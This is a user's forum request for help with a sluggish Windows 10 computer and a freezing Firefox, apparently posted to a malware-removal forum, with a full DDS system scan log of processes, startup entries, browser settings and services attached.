My computer is running sluggishly. I have installed Windows 10 (I believe about 3 weeks ago) which may be part of the issue. I also believe my computer may have been without virus protection for a couple days (subscription for Norton expired). When I try opening mozilla firefox, the browser freezes a lot and makes it difficult to perform simple tasks. My computer has a quad core processor, 16 gb ram, etc. so it should not be slowed down by menial tasks. Start up takes quite a bit longer than it previously did (maybe partially due to Windows 10 upgrade?).

Thank you in advance for your help!

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.10240.16412 BrowserJavaVersion: 11.45.2
Run by Chris at 18:37:06 on 2015-09-10
Microsoft Windows 10 Home 10.0.10240.0.1252.1.1033.18.8161.5456 [GMT -4:00]
.
AV: Norton 360 Premier *Enabled/Updated* {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Ad-Aware Antivirus *Disabled/Outdated* {B0CC18C6-E527-6EE6-874C-9D19920E5619}
SP: Ad-Aware Antivirus *Disabled/Outdated* {0BADF922-C31D-6168-BDFC-A66BE9891CA4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Spybot - Search and Destroy *Disabled/Updated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
SP: Norton 360 Premier *Enabled/Updated* {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Ad-Aware Firewall *Disabled* {88F799E3-AF48-6FBE-AC13-342C6CDD1162}
FW: Norton 360 Premier *Enabled* {6BFC5632-188D-B806-D13E-C607121B42A0}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\nvvsvc.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\WINDOWS\system32\nvvsvc.exe
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\WINDOWS\system32\svchost.exe -k apphost
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\WINDOWS\system32\dashost.exe
C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.8.586.8535\AdAwareService.exe
C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\WINDOWS\system32\svchost.exe -k iissvcs
C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe
C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
C:\WINDOWS\system32\mqsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\taskhostw.exe
C:\WINDOWS\Explorer.EXE
svchost.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.8.586.8535\AdAwareTray.exe
C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe
C:\WINDOWS\system32\fontdrvhost.exe
C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\Norton 360\Engine\22.5.2.15\N360.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\Norton 360\Engine\22.5.2.15\N360.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\Program Files (x86)\Steam\Steam.exe
C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Program Files (x86)\Common Files\Steam\SteamService.exe
C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerPlugin_18_0_0_232.exe
C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerPlugin_18_0_0_232.exe
C:\Windows\System32\InstallAgent.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\SearchProtocolHost.exe
C:\WINDOWS\system32\SearchFilterHost.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.bing.com/?pc=COSP&ptag=D091015-A60FA26CFB78147A880F&form=CONMHP&conlogo=CT3332038
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Skype for Business Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\office15\ochelper.dll
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton 360\Engine\22.5.2.15\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll
BHO: ArcPluginIEBHO Class: {84BFE29A-8139-402a-B2A4-C23AE9E1A75F} - C:\Program Files (x86)\Perfect World Entertainment\Arc\plugins\ArcPluginIE.dll
BHO: Microsoft SkyDrive Pro Browser Helper: {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\office15\grooveex.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\22.5.2.15\coieplg.dll
uRun: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
uRun: [GoogleChromeAutoLaunch_4E6299B33FA0592A57BB7C6E94F010D2] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
uRun: [Spotify Web Helper] "C:\Users\Chris\AppData\Roaming\Spotify\SpotifyWebHelper.exe"
uRun: [Web Companion] C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
uRun: [SpybotPostWindows10UpgradeReInstall] "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
mRun: [NUSB3MON] "C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe"
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
uPolicies-Explorer: NoDriveTypeAutoRun = dword:0
mPolicies-System: DSCAutomationHostEnabled = dword:2
IE: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\Program Files\Microsoft Office 15\Root\Office15\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office 15\root\office15\onbttnie.dll
IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\office15\ochelper.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office 15\root\office15\ONBttnIELinkedNotes.dll
LSP: C:\WINDOWS\System32\LavasoftTcpService.dll
Trusted Zone: clonewarsadventures.com
Trusted Zone: freerealms.com
Trusted Zone: localhost
Trusted Zone: soe.com
Trusted Zone: sony.com
Trusted Zone: webcompanion.com
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} - hxxps://juniper.net/dana-cached/sc/JuniperSetupClient.cab
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{1ac715e4-524d-40eb-8e44-73e6ef19aed1} : DHCPNameServer = 75.75.75.75 75.75.76.76
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\office15\msosb.dll
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Notify: SDWinLogon - SDWinLogon.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-BHO: Skype for Business Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ochelper.dll
x64-BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton 360\Engine64\22.5.2.15\coieplg.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\urlredir.dll
x64-BHO: Microsoft SkyDrive Pro Browser Helper: {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\grooveex.dll
x64-TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\22.5.2.15\coieplg.dll
x64-Run: [RTHDVCPL] "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
x64-Run: [NvBackend] "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
x64-Run: [ShadowPlay] C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\nvspcap64.dll,ShadowPlayOnSystemStart
x64-Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
x64-Run: [AdAwareTray] "C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.8.586.8535\AdAwareTray.exe"
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\onbttnie.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ochelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
x64-Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - <orphaned>
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Chris\AppData\Roaming\Mozilla\Firefox\Profiles\xampi2j7.default\
FF - prefs.js: browser.search.selectedEngine - Bing
FF - prefs.js: browser.startup.homepage - hxxp://www.bing.com/?pc=COSP&ptag=D091015-A60FA26CFB78147A880F&form=CONMHP&conlogo=CT3332038
FF - prefs.js: keyword.URL - hxxps://search.yahoo.com/search?fr=greentree_ff1&ei=utf-8&ilc=12&type=903578&p=
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_45\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_45\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll
FF - plugin: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll
FF - plugin: C:\Program Files (x86)\Perfect World Entertainment\Arc\Plugins\npArcPluginFF.dll
FF - plugin: C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL
FF - plugin: C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npMeetingJoinPluginOC.dll
FF - plugin: C:\Users\Chris\AppData\Local\Citrix\Plugins\104\npappdetector.dll
FF - plugin: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll
.
============= SERVICES / DRIVERS ===============
.
R0 SymEFASI;Symantec Extended File Attributes (SI);C:\WINDOWS\System32\drivers\N360x64\1605020.00F\symefasi64.sys [2015-7-26 1620720]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2015-7-10 106520]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2015-7-10 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2015-8-11 200528]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2015-7-10 215552]
R1 BHDrvx64;BHDrvx64;C:\Program Files (x86)\Norton 360\NortonData\22.5.0.124\Definitions\BASHDefs\20150904.001\BHDrvx64.sys [2015-9-9 1650936]
R1 ccSet_MCLIENT;Norton One Settings Manager;C:\WINDOWS\System32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [2013-10-15 168096]
R1 ccSet_N360;N360 Settings Manager;C:\WINDOWS\System32\drivers\N360x64\1605020.00F\ccsetx64.sys [2015-7-26 173808]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2015-7-10 83968]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2015-7-10 8192]
R1 IDSVia64;IDSVia64;C:\Program Files (x86)\Norton 360\NortonData\22.5.0.124\Definitions\IPSDefs\20150909.001\IDSviA64.sys [2015-9-9 767224]
R1 SymIRON;Symantec Iron Driver;C:\WINDOWS\System32\drivers\N360x64\1605020.00F\ironx64.sys [2015-7-26 297720]
R1 SymNetS;Symantec Network Security WFP Driver;C:\WINDOWS\System32\drivers\N360x64\1605020.00F\symnets.sys [2015-7-26 576248]
R2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2015-5-29 77128]
R2 ClickToRunSvc;Microsoft Office ClickToRun Service;C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe [2014-3-26 2765496]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2015-7-10 39856]
R2 DiagTrack;Diagnostics Tracking Service;C:\WINDOWS\System32\svchost.exe -k utcsvc [2015-7-10 39856]
R2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
R2 GfExperienceService;NVIDIA GeForce Experience Service;C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [2015-1-14 1155192]
R2 LavasoftAdAwareService11;Ad-Aware Service 11;C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.8.586.8535\AdAwareService.exe [2015-8-27 712432]
R2 LavasoftTcpService;LavasoftTcpService;C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [2015-9-9 2751760]
R2 MCLIENT;Norton One;C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccSvcHst.exe [2013-10-15 143928]
R2 N360;Norton 360;C:\Program Files (x86)\Norton 360\Engine\22.5.2.15\n360.exe [2015-7-26 282016]
R2 NvNetworkService;NVIDIA Network Service;C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [2015-1-14 1872504]
R2 NvStreamSvc;NVIDIA Streamer Service;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2015-7-29 5544568]
R2 SDUpdateService;Spybot-S&D 2 Updating Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2015-9-9 2088408]
R2 SDWSCService;Spybot-S&D 2 Security Center Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [2015-9-9 171928]
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [2015-9-1 410744]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2015-7-10 61952]
R2 tiledatamodelsvc;Tile Data model server;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
R3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2015-7-10 39856]
R3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2015-7-10 39856]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2015-9-9 155456]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
R3 MBfilt;MBfilt;C:\WINDOWS\System32\drivers\MBfilt64.sys [2015-6-24 41088]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2015-7-10 20992]
R3 NvStreamKms;NvStreamKms;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [2015-1-14 19576]
R3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);C:\WINDOWS\System32\drivers\nvvad64v.sys [2015-6-14 50472]
R3 rt640x64;Realtek RT640 NT Driver;C:\WINDOWS\System32\drivers\rt640x64.sys [2015-7-10 587264]
R3 ScpVBus;Scp Virtual Bus Driver;C:\WINDOWS\System32\drivers\ScpVBus.sys [2013-5-5 39168]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
S0 SymELAM;Symantec ELAM Driver;C:\WINDOWS\System32\drivers\N360x64\1605020.00F\symelam.sys [2015-7-26 24192]
S2 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService [2015-7-10 39856]
S2 SDScannerService;Spybot-S&D 2 Scanner Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [2015-9-9 1738168]
S2 SearchProtectionService;IE Search Set;C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [2015-9-9 16656]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2015-7-10 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2015-7-10 39856]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2015-7-10 17624]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2015-7-10 39856]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2015-7-10 32256]
S3 cancel;cancel;C:\Program Files (x86)\MSI\Super-Charger\cancel_64.sys [2012-9-5 16184]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2015-7-10 116736]
S3 CDPSvc;CDPSvc;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2015-7-10 27136]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 EasyAntiCheat;EasyAntiCheat;C:\WINDOWS\System32\EasyAntiCheat.exe --> C:\WINDOWS\System32\EasyAntiCheat.exe [?]
S3 embeddedmode;embeddedmode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel [2015-7-10 39856]
S3 fcvsc;fcvsc;C:\WINDOWS\System32\drivers\fcvsc.sys [2015-7-10 31232]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2015-7-10 20992]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2015-7-10 50016]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2015-7-10 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2015-7-10 122608]
S3 iaStorAV;Intel(R) SATA RAID Controller Windows;C:\WINDOWS\System32\drivers\iaStorAV.sys [2015-7-10 673120]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2015-7-10 424800]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2015-7-10 39856]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\WINDOWS\System32\ieetwcollector.exe [2015-7-10 115200]
S3 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2015-7-10 43872]
S3 IoQos;IoQos;C:\WINDOWS\System32\drivers\ioqos.sys [2015-7-10 26624]
S3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2015-7-10 104800]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2015-7-10 99168]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2015-7-10 705376]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2015-7-10 76128]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 netvsc;netvsc;C:\WINDOWS\System32\drivers\netvsc.sys [2015-7-10 94720]
S3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2015-7-10 39856]
S3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\lsass.exe [2015-7-10 56344]
S3 NTIOLib_1_0_3;NTIOLib_1_0_3;C:\Program Files (x86)\MSI\Super-Charger\NTIOLib_X64.sys [2012-9-5 14136]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2015-7-10 58208]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2015-7-10 58720]
S3 ReFSv1;ReFSv1;C:\WINDOWS\System32\drivers\refsv1.sys [2015-7-30 934752]
S3 RetailDemo;Retail Demo Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 ScDeviceEnum;Smart Card Device Enumeration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 SensorDataService;Sensor Data Service;C:\WINDOWS\System32\SensorDataService.exe [2015-7-30 1031680]
S3 SensorService;Sensor Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 SerCx2;Serial UART Support Library;C:\WINDOWS\System32\drivers\SerCx2.sys [2015-7-10 155488]
S3 smphost;Microsoft Storage Spaces SMP;C:\WINDOWS\System32\svchost.exe -k smphost [2015-7-10 39856]
S3 SmsRouter;Microsoft Windows SMS Router Service.;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 stornvme;Microsoft Standard NVM Express Driver;C:\WINDOWS\System32\drivers\stornvme.sys [2015-8-19 80720]
S3 storufs;Microsoft Universal Flash Storage (UFS) Driver;C:\WINDOWS\System32\drivers\storufs.sys [2015-7-10 40288]
S3 UcmCx0101;USB Connector Manager KMDF Class Extension;C:\WINDOWS\System32\drivers\UcmCx.sys [2015-7-10 61952]
S3 UcmUcsi;USB Connector Manager UCSI Client;C:\WINDOWS\System32\drivers\UcmUcsi.sys [2015-7-30 46080]
S3 UdeCx;USB Device Emulation Support Library;C:\WINDOWS\System32\drivers\Udecx.sys [2015-7-10 44032]
S3 UEFI;Microsoft UEFI Driver;C:\WINDOWS\System32\drivers\uefi.sys [2015-7-10 28512]
S3 Ufx01000;USB Function Class Extension;C:\WINDOWS\System32\drivers\ufx01000.sys [2015-7-10 245088]
S3 UfxChipidea;USB Chipidea Controller;C:\WINDOWS\System32\drivers\UfxChipidea.sys [2015-7-10 94048]
S3 ufxsynopsys;USB Synopsys Controller;C:\WINDOWS\System32\drivers\ufxsynopsys.sys [2015-7-10 127840]
S3 UrsChipidea;Chipidea USB Role-Switch Driver;C:\WINDOWS\System32\drivers\urschipidea.sys [2015-7-10 28512]
